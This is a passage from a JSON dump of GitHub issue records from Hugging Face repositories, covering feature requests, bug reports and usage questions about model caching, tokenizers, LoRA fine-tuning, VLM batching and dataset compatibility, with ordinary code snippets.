I'm stuck, however, with how to organize the model cache and dataset cache, and how to tell the train script that I'm using everything offline.\n\nI tried to download the model and dataset:\n```\n$ hf download lerobot/pi0 --cache-dir ~/lerobot_download/hf_models/lerobot/pi0/\n$ hf download lerobot/aloha_sim_transfer_cube_human --repo-type dataset --cache-dir ~/lerobot_download/hf_datasets/lerobot/aloha_sim_transfer_cube_human/\n```\n", "url": "https://github.com/huggingface/lerobot/issues/1792", "state": "closed", "labels": [], "created_at": "2025-08-26T10:20:56Z", "updated_at": "2025-09-03T10:48:37Z", "user": "dalishi" }, { "repo": "huggingface/accelerate", "number": 3748, "title": "How to pass two layer classes using --fsdp_transformer_layer_cls_to_wrap?", "body": "", "url": "https://github.com/huggingface/accelerate/issues/3748", "state": "closed", "labels": [], "created_at": "2025-08-26T08:56:32Z", "updated_at": "2025-08-26T09:14:18Z", "user": "sunjian2015" }, { "repo": "huggingface/diffusers", "number": 12239, "title": "Support for InfiniteTalk", "body": "### Model/Pipeline/Scheduler description\n\nhttps://huggingface.co/MeiGen-AI/InfiniteTalk is a wonderful audio-driven video generation model based on Wan2.1 that can also support infinite frames. The demos and users' workflows are also awesome; some examples: https://www.runninghub.cn/ai-detail/1958438624956203010\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/MeiGen-AI/InfiniteTalk\nhttps://github.com/MeiGen-AI/InfiniteTalk", "url": "https://github.com/huggingface/diffusers/issues/12239", "state": "open", "labels": [ "help wanted", "New pipeline/model", "contributions-welcome" ], "created_at": "2025-08-26T06:57:43Z", "updated_at": "2025-09-05T00:18:46Z", "comments": 1, "user": "supermeng" }, { "repo": "huggingface/transformers", "number": 40406, "title": "Cache tokenizer", "body": "### Feature request\n\nI am using Grounding DINO, which makes use of the `bert-base-uncased` tokenizer. Unfortunately, this tokenizer is never downloaded to the cache, forcing a remote call to the API. 
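The workaround I am experimenting with is to snapshot the tokenizer myself while online and then load it from disk (sketch):\n\n```python\nfrom transformers import AutoTokenizer\n\n# one-time, while online: fetch the tokenizer and pin it to a local folder\ntok = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\ntok.save_pretrained(\"./bert-base-uncased-local\")\n\n# later, offline: load from the local copy instead of the Hub\ntok = AutoTokenizer.from_pretrained(\"./bert-base-uncased-local\")\n```\n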
Please allow the tokenizer to be cached locally.\n\n### Motivation\n\nI want to use my software offline.\n\n### Your contribution\n\nI'm trying to find a way to download it manually as a workaround.", "url": "https://github.com/huggingface/transformers/issues/40406", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-08-24T08:36:14Z", "updated_at": "2025-09-10T11:49:06Z", "comments": 5, "user": "axymeus" }, { "repo": "huggingface/tokenizers", "number": 1851, "title": "SentencePieceBPE + Unicode NFD preprocessing leads to noise?", "body": "Hi,\nI have had the issue multiple times, so I assume I am doing something wrong.\n\n**Versions:**\n- tokenizers==0.21.4\n- transformers==4.55.4\n\n**Training script**\n\n```py\nfrom transformers import PreTrainedTokenizerFast\nfrom pathlib import Path\nfrom read import get_texts_iter_for_tokenizer\nfrom tokenizers import SentencePieceBPETokenizer, normalizers, pre_tokenizers\n\ndef main():\n output_dir = Path(\"hf_tokenizer\")\n output_dir.mkdir(parents=True, exist_ok=True)\n\n # Dump texts to a file\n texts = get_texts_iter_for_tokenizer()\n\n # Train SentencePiece model\n tokenizer = SentencePieceBPETokenizer()\n\n # Adding normalization and pre_tokenizer\n tokenizer.normalizer = normalizers.Sequence([normalizers.NFD()])\n tokenizer.pre_tokenizer = pre_tokenizers.ByteLevel()\n\n # Adding special tokens and creating trainer instance\n special_tokens = [\"\", \"\", \"\", \"\", \"\"]\n\n # Training from iterator REMEMBER it's training on test set...\n tokenizer.train_from_iterator(texts, special_tokens=special_tokens, show_progress=True)\n\n fast_tokenizer = PreTrainedTokenizerFast(\n tokenizer_object=tokenizer,\n unk_token=\"\",\n pad_token=\"\",\n cls_token=\"\",\n sep_token=\"\",\n mask_token=\"\"\n )\n fast_tokenizer.save_pretrained(str(output_dir))\n```\n\nScript to reproduce bug:\n\n```py\nfrom transformers import PreTrainedTokenizerFast\n\nhf_tokenizer = PreTrainedTokenizerFast.from_pretrained(\"hf_tokenizer\")\n\n# Test\nprint(hf_tokenizer.tokenize(\"\u204ai\u0303 re\u0303 dn\u0303i u\u033esum\"))\n# ['\u00e2\u0123\u012c', 'i', '\u00cc\u0125', '\u0120re', '\u00cc\u0125', '\u0120dn', '\u00cc\u0125', 'i', '\u0120u', '\u00cc\u00be', 'sum']\nprint(hf_tokenizer.decode(hf_tokenizer.encode(\"\u204ai\u0303 re\u0303 dn\u0303i u\u033esum\")))\n# \u00e2\u0123\u012ci\u00cc\u0125\u0120re\u00cc\u0125\u0120dn\u00cc\u0125i\u0120u\u00cc\u00besum\n```\n\nI assume I am doing something wrong around preprocessing / postprocessing?\n\n\n\n", "url": "https://github.com/huggingface/tokenizers/issues/1851", "state": "open", "labels": [], "created_at": "2025-08-24T08:28:08Z", "updated_at": "2025-09-17T09:33:11Z", "comments": 3, "user": "PonteIneptique" }, { "repo": "huggingface/coreml-examples", "number": 17, "title": "how to get absolute depth, in meters?", "body": "how to get absolute depth, in meters?", "url": "https://github.com/huggingface/coreml-examples/issues/17", "state": "open", "labels": [], "created_at": "2025-08-24T03:20:58Z", "updated_at": "2025-08-24T03:20:58Z", "user": "jay25208" }, { "repo": "huggingface/transformers", "number": 40398, "title": "NVIDIA RADIO-L", "body": "### Model description\n\nWhile exploring, I came across [nvidia/RADIO-L](https://huggingface.co/nvidia/RADIO-L) and was wondering about its current support.\n\n1. May I ask if RADIO-L is already supported in Transformers?\n2. If not, would it be considered suitable to add?\n3. 
If a model requires trust_remote_code=True, what does that signify regarding its suitability for addition to Transformers?\n\nPlease share the general criteria for models to be added to Transformers.\n\nThank you very much for your guidance.\n\ncc: @zucchini-nlp @Rocketknight1 \n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/40398", "state": "open", "labels": [ "New model" ], "created_at": "2025-08-23T11:14:42Z", "updated_at": "2025-08-26T14:44:11Z", "comments": 4, "user": "Uvi-12" }, { "repo": "huggingface/diffusers", "number": 12222, "title": "[Contribution welcome] adding a fast test for Qwen-Image Controlnet Pipeline", "body": "We are looking for help from the community to add a fast test for this PR \nhttps://github.com/huggingface/diffusers/pull/12215\n\nYou can add a file under this folder:\nhttps://github.com/huggingface/diffusers/tree/main/tests/pipelines/qwenimage\n\n\nYou can reference other tests we added for qwen pipelines [example](https://github.com/huggingface/diffusers/blob/main/tests/pipelines/qwenimage/test_qwenimage.py), as well as controlnet fast tests [example](https://github.com/huggingface/diffusers/tree/main/tests/pipelines/controlnet_flux)", "url": "https://github.com/huggingface/diffusers/issues/12222", "state": "closed", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-08-22T21:04:50Z", "updated_at": "2025-08-25T01:58:59Z", "comments": 6, "user": "yiyixuxu" }, { "repo": "huggingface/diffusers", "number": 12221, "title": "[Looking for community contribution] support DiffSynth Controlnet in diffusers", "body": "### Model/Pipeline/Scheduler description\n\nHi!\nWe want to add first-party support for DiffSynth controlnet in diffusers, and we are looking for some help from the community! \n\nLet me know if you're interested! \n\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/SahilCarterr/Qwen-Image-Blockwise-ControlNet-Canny\nhttps://huggingface.co/SahilCarterr/Qwen-Image-Blockwise-ControlNet-Depth", "url": "https://github.com/huggingface/diffusers/issues/12221", "state": "open", "labels": [ "help wanted", "Good second issue", "contributions-welcome" ], "created_at": "2025-08-22T20:49:18Z", "updated_at": "2025-09-11T10:01:08Z", "comments": 5, "user": "yiyixuxu" }, { "repo": "huggingface/safetensors", "number": 649, "title": "How to determine if a file is a safetensor file", "body": "Is there a good and fast way to determine if a file is a safetensors file? We would like to avoid reading the whole header. \n\nBackground: we are currently trying to add safetensors as a datatype to the Galaxy project: https://github.com/galaxyproject/galaxy/pull/20754", "url": "https://github.com/huggingface/safetensors/issues/649", "state": "open", "labels": [], "created_at": "2025-08-22T09:17:49Z", "updated_at": "2025-09-03T11:08:30Z", "user": "bernt-matthias" }, { "repo": "huggingface/lerobot", "number": 1775, "title": "What's the finetuning method? 
Is it all full-finetuning?", "body": "I could't find any thing about LORA finetuning, is the default method full-finetuning by now?", "url": "https://github.com/huggingface/lerobot/issues/1775", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-08-22T06:48:25Z", "updated_at": "2025-10-07T20:55:10Z", "user": "lin-whale" }, { "repo": "huggingface/lerobot", "number": 1774, "title": "Finetune smolvla with vision encoder", "body": "### System Info\n\n```Shell\n- `lerobot` version: 0.1.0\n- Platform: Linux-6.8.0-65-generic-x86_64-with-glibc2.35\n- Python version: 3.10.18\n- Huggingface_hub version: 0.33.4\n- Dataset version: 3.6.0\n- Numpy version: 2.2.6\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Cuda version: 12060\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nnothing\n\n### Expected behavior\n\nI found that when attempting to fine-tune the model to grasp objects of different colors but identical shapes, it consistently grasped the wrong object. I found that the output feature differences from the VLM for the same image, such as \u201cgrasp the green duck into the box\u201d versus \u201cgrasp the yellow duck into the box,\u201d were nearly zero. Is it possible that the VLM has weak color differentiation capabilities? Can the official support fine-tuning the visual encoder together?", "url": "https://github.com/huggingface/lerobot/issues/1774", "state": "open", "labels": [ "question", "policies", "good first issue" ], "created_at": "2025-08-22T05:20:58Z", "updated_at": "2025-10-08T11:31:02Z", "user": "THU-yancow" }, { "repo": "huggingface/transformers", "number": 40366, "title": "[Feature] Support fromjson in jinja2 chat template rendering", "body": "### Feature request\n\nGLM45 requires `fromjson` in jinja2 to deserialize str typed `tool_calls.function.arguments` to dict within chat template so it can iterate over `arguments`'s k-v within jinja2 chat template. \n\n```\n{% for tc in m.tool_calls %}\n{%- if tc.function %}\n{%- set tc = tc.function %}\n{%- endif %}\n{{ '\\n' + tc.name }}\n{% set _args = tc.arguments | fromjson %}\n{% for k, v in _args.items() %}\n{{ k }}\n{{ v \\| tojson(ensure_ascii=False) if v is not string else v }}\n{% endfor %}\n{% endfor %}\n{% endif %}\n```\n\nhttps://huggingface.co/zai-org/GLM-4.5/blob/main/chat_template.jinja#L75\n\n### Motivation\n\nGLM45 requires `fromjson` in jinja2 to deserialize str typed `tool_calls.function.arguments` to dict within chat template so it can iterate over `arguments`'s k-v within jinja2 chat template. \n\n```\n{% for tc in m.tool_calls %}\n{%- if tc.function %}\n{%- set tc = tc.function %}\n{%- endif %}\n{{ '\\n' + tc.name }}\n{% set _args = tc.arguments | fromjson %}\n{% for k, v in _args.items() %}\n{{ k }}\n{{ v \\| tojson(ensure_ascii=False) if v is not string else v }}\n{% endfor %}\n{% endfor %}\n{% endif %}\n```\n\nhttps://huggingface.co/zai-org/GLM-4.5/blob/main/chat_template.jinja#L75\n\n### Your contribution\n\nI will submit a PR", "url": "https://github.com/huggingface/transformers/issues/40366", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-08-22T05:11:06Z", "updated_at": "2025-08-22T05:18:45Z", "comments": 1, "user": "byjiang1996" }, { "repo": "huggingface/peft", "number": 2749, "title": "Set multiple adapters actively when training", "body": "Hi! 
In incremental scenarios, I want to train a new adapter while keeping some old adapters active. Notice that PeftModel can set the active adapter via \"model.set_adapter()\", but each call can set only one adapter, since the type of the \"adapter_name\" arg is \"str\" rather than \"List[str]\". I also notice that the class \"PeftMixedModel\" can set multiple adapters active but only supports inference, and this class uses \"model.base_model.set_adapter()\" to achieve it. So I am not sure whether I can also set multiple adapters active when training. My code is as follows:\n\n```python\nmodel = AutoModelForCausalLM.from_pretrained()\npeft_config = LoraConfig()\nmodel = get_peft_model(model, peft_config, adapter_name=\"new\")\nmodel.load_adapter(adapter_path, adapter_name=\"old\")\nmodel.base_model.set_adapter([\"new\", \"old\"])\nfor name, param in model.named_parameters():\n if \"lora_A.old\" in name or \"lora_B.old\" in name:\n param.requires_grad = False\ntraining_args = TrainingArguments()\ntrainer = Trainer()\ntrainer.train()\n```\n", "url": "https://github.com/huggingface/peft/issues/2749", "state": "closed", "labels": [], "created_at": "2025-08-21T09:59:25Z", "updated_at": "2025-09-29T15:04:15Z", "comments": 4, "user": "Yongyi-Liao" }, { "repo": "huggingface/lerobot", "number": 1765, "title": "Questions about using LIBERO dataset (loss starts extremely high)", "body": "Hello,\n\nI am training on the \"**IPEC-COMMUNITY/libero_spatial_no_noops_1.0.0_lerobot**\" dataset, but I encountered an issue (here is the dataset: https://huggingface.co/datasets/IPEC-COMMUNITY/libero_spatial_no_noops_1.0.0_lerobot):\n\nAt the very beginning of training, the loss is extremely high (around 500).\n\nI would like to clarify a few points:\n\nIs the policy output expected to be relative actions or absolute actions?\nDo I need to perform any preprocessing on the dataset? For example:\nNormalizing the gripper action to the range [-1, 1]?\nAny other scaling or transformation?\n\nWhat is the exact relationship between the action and state in the dataset?\nI noticed that trajectories sometimes look different than expected (shown in the figure below).\nDo we need to process either the action or state to align them?\n\nAny guidance on the correct usage of the dataset would be greatly appreciated. Thanks!\n\n\"Image\"\n\n", "url": "https://github.com/huggingface/lerobot/issues/1765", "state": "open", "labels": [ "question", "dataset", "simulation" ], "created_at": "2025-08-21T05:06:51Z", "updated_at": "2025-09-23T09:46:41Z", "user": "hamondyan" }, { "repo": "huggingface/transformers", "number": 40330, "title": "open-qwen2vl-base", "body": "### Model description\n\nIs there any plan to add the open-qwen2vl-base model? \n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/40330", "state": "open", "labels": [ "New model" ], "created_at": "2025-08-21T02:24:01Z", "updated_at": "2025-08-23T10:18:28Z", "comments": 5, "user": "olccihyeon" }, { "repo": "huggingface/tokenizers", "number": 1850, "title": "Safe encoding of strings that might contain special token text", "body": "When feeding untrusted string inputs into an LLM, it's often important not to convert any of the input into special tokens, which might indicate message boundaries or other syntax. 
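(On the transformers side there is a `split_special_tokens` flag that sounds related; a sketch of what I mean is below, but I would like the equivalent at the `tokenizers` level.)\n\n```python\nfrom transformers import AutoTokenizer\n\n# with split_special_tokens=True, special-token text in the input is tokenized\n# as ordinary text instead of being mapped to the special token id\ntok = AutoTokenizer.from_pretrained(\"gpt2\", split_special_tokens=True)\nprint(tok.tokenize(\"<|endoftext|>\"))  # pieces of the literal string, not one special token\n```\n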
Among other reasons, this is important for guarding against prompt injection attacks.\n\ntiktoken provides a way to control how the encoding deals with special tokens, using the `allowed_special` and `disallowed_special` arguments. For example:\n\n```python\nimport tiktoken\n\nenc = tiktoken.get_encoding(\"o200k_base\")\nenc.encode(\"<|endoftext|>\", disallowed_special=[]) # => [27, 91, 419, 1440, 919, 91, 29]\nenc.encode(\"<|endoftext|>\") # => ValueError\nenc.encode(\"<|endoftext|>\", allowed_special=set([\"<|endoftext|>\"])) # => [199999]\n```\n\nHowever, I can't figure out how to avoid tokenizing strings like <|im_start|> into special tokens, when using the tokenizers library. Note that I want to be able to *decode* the special token to its string representation for visualization. However, I want to make sure that when I call `encode`, I don't get a special token -- I tokenize the string representation as if there was no <|im_start|> special token. \n\nMaybe the easiest way to do this is to create two separate tokenizers, by creating new json files, but this is pretty inconvenient.", "url": "https://github.com/huggingface/tokenizers/issues/1850", "state": "closed", "labels": [], "created_at": "2025-08-21T00:53:17Z", "updated_at": "2025-09-01T18:03:59Z", "comments": 5, "user": "joschu" }, { "repo": "huggingface/peft", "number": 2746, "title": "Gemma 2/3 Attention: Expected a single attention mask, got 2 instead", "body": "Hi! I'm getting this error `ValueError: Expected a single attention mask, got 2 instead` at inference (after prompt tuning)--I've only had this happen with the Gemma 2 and 3 models, so it might have something to do with their specific attention mechanism. Is there a workaround (or am I maybe missing something)?\n\nI'm running the following:\n```\nmodel_name = \"google/gemma-2-2b\"\ntokenizer = AutoTokenizer.from_pretrained(model_name)\nmodel = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch.float16, device_map=\"auto\")\n\nsoft_model = get_peft_model(model, prompt_config)\n\ninputs = tokenizer(model_instruction, return_tensors=\"pt\")\noutputs = soft_model.generate(\n input_ids=inputs[\"input_ids\"],\n attention_mask=inputs[\"attention_mask\"],\n max_new_tokens=num_gen_tokens,\n eos_token_id=tokenizer.eos_token_id,\n )\n```", "url": "https://github.com/huggingface/peft/issues/2746", "state": "closed", "labels": [], "created_at": "2025-08-20T18:08:02Z", "updated_at": "2025-08-27T02:43:22Z", "comments": 8, "user": "michelleezhang" }, { "repo": "huggingface/transformers", "number": 40323, "title": "Is there a plan to add DINOv3 into AutoBackbone?", "body": "### Feature request\n\nIs there a plan to add DINOv3 to AutoBackbone? At present, DINOv2 is already inside, and I think DINOv3 should be able to inherit it directly. 
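For context, this is the pattern that already works with DINOv2 and that I would hope to mirror (minimal sketch):\n\n```python\nfrom transformers import AutoBackbone\n\n# works today with DINOv2; the hope is that a DINOv3 checkpoint could drop in the same way\nbackbone = AutoBackbone.from_pretrained(\"facebook/dinov2-base\", out_indices=[-1])\n```\n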
Appreciate a lot.\n\n### Motivation\n\nFor the convenience of use\n\n### Your contribution\n\nDINOv3 should be able to inherit from DINOv2 directly.", "url": "https://github.com/huggingface/transformers/issues/40323", "state": "closed", "labels": [ "Feature request", "Vision" ], "created_at": "2025-08-20T16:02:45Z", "updated_at": "2025-11-11T16:22:08Z", "comments": 4, "user": "Farenweh" }, { "repo": "huggingface/transformers", "number": 40263, "title": "[VLMs] How to process a batch that contains samples with and without images?", "body": "Is there a **standard** way to process a batch that contains samples with and without images?\n\nFor example:\n\n```python\nfrom transformers import AutoProcessor\nfrom PIL import Image\nimport numpy as np\n\nmodel_id = ... # tested are \"google/gemma-3-4b-it\", \"HuggingFaceM4/idefics2-8b\", \"HuggingFaceM4/Idefics3-8B-Llama3\", \"HuggingFaceTB/SmolVLM2-2.2B-Instruct\", \"llava-hf/llava-1.5-7b-hf\", \"llava-hf/llava-v1.6-mistral-7b-hf\", \"OpenGVLab/InternVL3-8B-hf\", \"Qwen/Qwen2-VL-2B-Instruct\",\"Qwen/Qwen2.5-VL-3B-Instruct\"]\nprocessor = AutoProcessor.from_pretrained(model_id)\n\nmessages = [\n [{\"role\": \"user\", \"content\": [{\"type\": \"text\", \"text\": \"What's the capital of France?\"}]}],\n [{\"role\": \"user\", \"content\": [{\"type\": \"image\"}, {\"type\": \"text\", \"text\": \"What is it?\"}]}],\n]\ntexts = processor.apply_chat_template(messages)\n\nimage = Image.fromarray(\n np.random.uniform(low=0.0, high=255.0, size=(32, 48, 3)).astype(np.uint8)\n)\nimages = [[], [image]]\n\nprocessor(images=images, text=texts)\n```\n\nThis fails for all models I tested.\n\n\n```python\nimages=[image] # The only syntax I found that works for some models: llava-hf/llava-1.5-7b-hf, llava-hf/llava-v1.6-mistral-7b-hf, OpenGVLab/InternVL3-8B-hf, Qwen/Qwen2-VL-2B-Instruct, Qwen/Qwen2.5-VL-3B-Instruct\nimages = [None, [image]] # always fails\nimages = [None, image] # always fails\nimages = [[], [image]] # always fails\n```\n\n### Expected behavior\n\nThere should be a standard / documented way to batch process mixed inputs (some samples with images, some without).\n\n\n", "url": "https://github.com/huggingface/transformers/issues/40263", "state": "closed", "labels": [], "created_at": "2025-08-19T05:09:36Z", "updated_at": "2025-09-18T08:08:51Z", "user": "qgallouedec" }, { "repo": "huggingface/diffusers", "number": 12185, "title": "What's the difference between DreamBooth LoRa and traditional LoRa?", "body": "I see a lot of examples using DreamBooth LoRa training code. What's the difference between this and traditional LoRa training? Can this DreamBooth LoRa training code be adapted to standard SFT LoRa code? 
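\n\nBy \"traditional LoRa training\" I mean something like the standard text-to-image LoRA setup (a minimal sketch using peft on the UNet; the target modules follow the usual attention projections):\n\n```python\nfrom diffusers import UNet2DConditionModel\nfrom peft import LoraConfig\n\nunet = UNet2DConditionModel.from_pretrained(\"runwayml/stable-diffusion-v1-5\", subfolder=\"unet\")\nunet.requires_grad_(False)  # freeze the base weights\nlora_config = LoraConfig(r=4, lora_alpha=4, init_lora_weights=\"gaussian\", target_modules=[\"to_q\", \"to_k\", \"to_v\", \"to_out.0\"])\nunet.add_adapter(lora_config)  # only the LoRA parameters are trainable\n# ...then a plain denoising-loss loop over (image, caption) pairs,\n# with no class images and no prior-preservation term\n```\n\n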
Does disabling with_prior_preservation reduce it to normal LoRA training?", "url": "https://github.com/huggingface/diffusers/issues/12185", "state": "open", "labels": [], "created_at": "2025-08-19T03:32:30Z", "updated_at": "2025-08-19T15:04:22Z", "comments": 3, "user": "MetaInsight7" }, { "repo": "huggingface/trl", "number": 3918, "title": "How to use trl-SFTTrainer to train Qwen-30B-A3B?", "body": "Has anyone tried using TRL to train Qwen-30B-A3B-Instruct-2507?", "url": "https://github.com/huggingface/trl/issues/3918", "state": "open", "labels": [ "\u2753 question" ], "created_at": "2025-08-19T03:04:36Z", "updated_at": "2025-08-19T03:11:30Z", "user": "JeffWb" }, { "repo": "huggingface/datasets", "number": 7739, "title": "Replacement of \"Sequence\" feature with \"List\" breaks backward compatibility", "body": "PR #7634 replaced the Sequence feature with List in 4.0.0, so datasets saved with version 4.0.0 with that feature cannot be loaded by earlier versions. There is no clear option in 4.0.0 to use the legacy feature type to preserve backward compatibility.\n\nWhy is this a problem? I have a complex preprocessing and training pipeline dependent on 3.6.0; we manage a very large number of separate datasets that get concatenated during training. If just one of those datasets is saved with 4.0.0, they become unusable, and we have no way of \"fixing\" them. I can load them in 4.0.0 but I can't re-save with the legacy feature type, and I can't load it in 3.6.0 for obvious reasons.\n\nPerhaps I'm missing something here, since the PR says that backward compatibility is preserved; if so, it's not obvious to me how.", "url": "https://github.com/huggingface/datasets/issues/7739", "state": "open", "labels": [], "created_at": "2025-08-18T17:28:38Z", "updated_at": "2025-09-10T14:17:50Z", "comments": 1, "user": "evmaki" }, { "repo": "huggingface/gsplat.js", "number": 119, "title": "How to 4DGS (.splatv)", "body": "How can I generate the .splatv file and get it running on my local server?", "url": "https://github.com/huggingface/gsplat.js/issues/119", "state": "open", "labels": [], "created_at": "2025-08-18T07:35:04Z", "updated_at": "2025-08-18T07:35:04Z", "user": "CetosEdit" }, { "repo": "huggingface/diffusers", "number": 12165, "title": "Failed to finetune the pre-trained model of 'stable-diffusion-v1-4' on image inpainting task", "body": "I finetuned the pre-trained 'stable-diffusion-inpainting' model on the image inpainting task, and everything works well since that model was trained for inpainting. But when I finetuned the pre-trained 'stable-diffusion-v1-4' model, which is trained on text-to-image, the loss is NaN and the result is pure black.\n\nAs the two models have different input channels for the unet, I have changed the unet input channels of 'stable-diffusion-v1-4' to fit the inpainting task. So far, the code can run, but the loss is NaN. I do not know where the problem is. How can I finetune the pre-trained 'stable-diffusion-v1-4' model on the image inpainting task? Should I change some hyperparameters? 
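\n\nFor reference, the conv_in change I mean looks roughly like this (a simplified sketch, mirroring the usual instruct-pix2pix-style channel expansion from 4 to 9, with the new mask and masked-latent channels zero-initialized):\n\n```python\nimport torch\nfrom diffusers import UNet2DConditionModel\n\nunet = UNet2DConditionModel.from_pretrained(\"CompVis/stable-diffusion-v1-4\", subfolder=\"unet\")\nold_conv = unet.conv_in\nnew_conv = torch.nn.Conv2d(9, old_conv.out_channels, old_conv.kernel_size, old_conv.stride, old_conv.padding)\nwith torch.no_grad():\n    new_conv.weight.zero_()  # the 5 new input channels start as zeros\n    new_conv.weight[:, :4, :, :].copy_(old_conv.weight)  # keep the pretrained latent channels\n    new_conv.bias.copy_(old_conv.bias)\nunet.conv_in = new_conv\nunet.register_to_config(in_channels=9)\n```\n\n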
Any help will be appreciated, thanks!", "url": "https://github.com/huggingface/diffusers/issues/12165", "state": "closed", "labels": [], "created_at": "2025-08-17T07:15:36Z", "updated_at": "2025-09-07T09:35:38Z", "comments": 7, "user": "micklexqg" }, { "repo": "huggingface/gym-hil", "number": 27, "title": "How to close the gripper in the gym-hil sim?", "body": "Hello all.\n\nI'm using macOS to practice with the gym-hil sim tutorial.\nI figured out how to move the robot along x, y, z, but I can't close the gripper....\n\nCould you all please share the correct key?\nChatGPT suggested the Ctrl key, but it's not working!\n\nThanks in advance.", "url": "https://github.com/huggingface/gym-hil/issues/27", "state": "open", "labels": [], "created_at": "2025-08-15T13:46:12Z", "updated_at": "2025-08-15T13:57:26Z", "user": "cory0619" }, { "repo": "huggingface/peft", "number": 2742, "title": "RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn", "body": "Hello, I am fine-tuning the LLaMA-2 7B model on an A100 40 GB GPU. Initially, I was getting a CUDA out-of-memory error. I tried various methods, such as reducing the batch size, but none worked. Then I enabled:\n\nmodel.gradient_checkpointing_enable()\n\nAfter doing this, the OOM issue was resolved, but now I get the following error during backpropagation:\n\ntorch.autograd.backward(\n File \".../torch/autograd/__init__.py\", line 354, in backward\n _engine_run_backward(\n File \".../torch/autograd/graph.py\", line 829, in _engine_run_backward\n return Variable._execution_engine.run_backward( \nRuntimeError: element 0 of tensors does not require grad and does not have a grad_fn\n\nI also tried:\n\nmodel.enable_input_require_grads()\n\nbut the error still persists. I suspect the issue is related to enabling gradient checkpointing.\n\n# In model_init()\nreft_model.gradient_checkpointing_enable()\nreft_model.enable_input_require_grads()\n\nIs there something I am missing when using gradient checkpointing in this setup?", "url": "https://github.com/huggingface/peft/issues/2742", "state": "closed", "labels": [], "created_at": "2025-08-15T06:21:50Z", "updated_at": "2025-09-23T15:04:07Z", "comments": 4, "user": "Mishajain1110" }, { "repo": "huggingface/trl", "number": 3896, "title": "How to gather completions before computing rewards in GRPOTrainer", "body": "Hi, \nI found that the `reward_funcs` passed to GRPOTrainer are applied per device.\nThat is, if I set `num_generation=16`, `per_device_train_batch_size=4`, my customized reward function receives only `4` completions.\nHowever, my customized reward function calculates rewards based on a global view over all `16` completions for each question.\nHow can I implement this?", "url": "https://github.com/huggingface/trl/issues/3896", "state": "closed", "labels": [ "\u2753 question", "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-08-14T14:41:42Z", "updated_at": "2025-09-03T14:09:16Z", "user": "rubickkcibur" }, { "repo": "huggingface/peft", "number": 2738, "title": "Which base model weights are getting frozen after applying LoRA?", "body": "I have finetuned LLaVA-v1.5-7B with peft LoRA, and I have found that after adding the LoRA adapters, all the weights are frozen except for the newly added LoRA layers and the mm_projector weights (non-LoRA). 
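\n\nA quick way to check which weights are trainable (a minimal sketch, run after wrapping the model with get_peft_model):\n\n```python\ntrainable = [n for n, p in model.named_parameters() if p.requires_grad]\nfrozen = [n for n, p in model.named_parameters() if not p.requires_grad]\nprint(f\"trainable: {len(trainable)}, frozen: {len(frozen)}\")\n# in my case the trainable list contains the lora_A/lora_B layers,\n# but also the mm_projector weights\nfor n in trainable[:20]:\n    print(n)\n```\n\n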
I will be glad to know the freezing logic implemented by peft since not all the base model weights are getting frozen after applying LoRA.\nAlso, I have not added the mm_projector weights inside the module_to_save.", "url": "https://github.com/huggingface/peft/issues/2738", "state": "closed", "labels": [], "created_at": "2025-08-13T17:35:10Z", "updated_at": "2025-08-14T04:20:42Z", "comments": 1, "user": "srbh-dl" }, { "repo": "huggingface/diffusers", "number": 12136, "title": "How to use Diffusers to Convert Safetensors SDXL 1.0 to Onnx?", "body": "Hello,\n\nI'm trying to convert a safetensors checkpoint for SDXL to onnx format.\n\nI've tried Optimum already but it fails everytime.\n\nPlease help.", "url": "https://github.com/huggingface/diffusers/issues/12136", "state": "closed", "labels": [], "created_at": "2025-08-13T06:33:22Z", "updated_at": "2025-10-31T03:13:28Z", "user": "CypherpunkSamurai" }, { "repo": "huggingface/lerobot", "number": 1712, "title": "Why hasn't the pi0 model learned the ability to place something in the specified positions? Is it because the number of datasets is insufficient?", "body": "I am creating a tic-tac-toe board and using yellow and green sandbags as pieces. I have collected a dataset of \"the entire process of a robotic arm picking up yellow sandbags and placing them in nine different positions on the board\". This dataset is used to train the pi0 model to achieve autonomous playing. The collection scope includes: changes in the board scene, motor action status, visual images, and text task instructions. However, when testing the trained pi0 model by giving tasks of placing sandbags in different positions on the board, it turns out that the so101 robotic arm has a poor understanding of position information. It can grab the sandbags just like in the recorded dataset, but most of the time it cannot place them in the specified positions.", "url": "https://github.com/huggingface/lerobot/issues/1712", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-12T10:15:26Z", "updated_at": "2025-12-22T08:10:47Z", "user": "Alex-Wlog" }, { "repo": "huggingface/transformers", "number": 40089, "title": "Could not import module 'AutoTokenizer'. 
